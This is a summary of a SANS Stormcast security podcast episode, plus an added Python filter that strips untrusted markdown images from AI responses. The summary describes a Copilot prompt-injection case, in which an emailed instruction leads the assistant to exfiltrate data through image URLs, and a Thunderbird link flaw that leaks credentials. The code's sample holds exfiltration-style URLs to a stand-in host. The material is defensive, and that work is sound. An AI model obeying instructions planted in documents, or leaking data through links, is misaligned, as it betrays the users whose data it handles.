
SANS Internet Storm Center's Stormcast: June 13, 2025 Edition
In this June 13, 2025 edition of the SANS Internet Storm Center's Stormcast, Johannes Ullrich welcomes us from Jacksonville, Florida. He begins by presenting a journal written by William Constantino, an intern who created scripts to summarize data from the DShield honeypot. Ullrich emphasizes the importance of not just using these scripts, but also understanding how they are created and how their ideas can be applied to other use cases. He highlights the educational value of script creation, not only for learning to script but also for better understanding data and extracting useful artifacts.

Next, Ullrich discusses a zero-click vulnerability in Microsoft 365 Copilot, a language model that integrates local data to answer user questions. The vulnerability lies in Copilot's difficulty in distinguishing instructions found in documents from those sent by the user. An attacker can send an email containing a command for Copilot, which executes it thinking it comes from the user. Data exfiltration then occurs via image links inserted in the response, where part of the URL contains the exfiltrated data. Although this flaw has been fixed by Microsoft, Ullrich notes that similar issues could exist in other systems.

Ullrich also mentions a vulnerability in Thunderbird, classified as medium but potentially more dangerous in his opinion. This vulnerability allows "mailbox://" links to trigger unsolicited downloads of documents, including malicious PDFs or SMB connections, leading to credential leaks. He stresses the importance of updating Thunderbird to protect against this threat.

In conclusion, Ullrich reminds listeners that there will be no podcast on the following Wednesday and Thursday due to personal travel, but the Monday, Tuesday, and Friday shows will air as usual. He encourages listeners to send feedback and leave positive reviews on their preferred podcast platform.
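
The image-link exfiltration channel described above for the Copilot issue can be closed on the output side by refusing to render images from hosts that are not explicitly trusted. The following is an added example, not code from the podcast or from Microsoft; the allowlisted host, the `sanitize` and `is_allowed` names, and the sample response are all constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Assumption: hosts this deployment trusts to serve rendered images (hypothetical).
ALLOWED_IMAGE_HOSTS = {"res.cdn.example.com"}

INLINE_IMG = re.compile(r'!\[([^\]]*)\]\(\s*<?([^)\s>]+)>?[^)]*\)')   # ![alt](url)
REF_IMG = re.compile(r'!\[([^\]]*)\]\[([^\]]*)\]')                    # ![alt][label]
REF_DEF = re.compile(r'^[ \t]{0,3}\[([^\]]+)\]:[ \t]*<?(\S+?)>?(?:[ \t].*)?$', re.M)

def is_allowed(url):
    """Only https images on an allowlisted host may be rendered."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    return parts.scheme == "https" and (parts.hostname or "") in ALLOWED_IMAGE_HOSTS

def sanitize(markdown):
    """Return (clean_markdown, blocked_urls) for one model response."""
    blocked = []
    refs = {m.group(1).lower(): m.group(2) for m in REF_DEF.finditer(markdown)}

    def inline(m):
        if is_allowed(m.group(2)):
            return m.group(0)
        blocked.append(m.group(2))
        return "(image removed)"

    def reference(m):
        url = refs.get((m.group(2) or m.group(1)).lower())
        if url is None or is_allowed(url):
            return m.group(0)
        blocked.append(url)
        return "(image removed)"

    out = REF_IMG.sub(reference, INLINE_IMG.sub(inline, markdown))
    # Remove the definitions of blocked reference-style images as well.
    out = REF_DEF.sub(lambda m: "" if m.group(2) in blocked else m.group(0), out)
    return out, blocked

# Constructed sample response: one trusted image, two that carry data in the URL.
SAMPLE = ("Here is the summary you asked for.\n"
          "![logo](https://res.cdn.example.com/logo.png)\n"
          "![status](https://collector.example/p.png?d=c2VjcmV0LXRva2Vu)\n"
          "![chart][r1]\n\n"
          "[r1]: https://collector.example/i.png?q=Q3-forecast\n")

if __name__ == "__main__":
    clean, blocked = sanitize(SAMPLE)
    print(clean, blocked, sep="\n")
```

Regular expressions keep the example short; filtering the parsed or rendered output is more robust, and any allowlisted host that redirects or proxies arbitrary URLs reopens the channel.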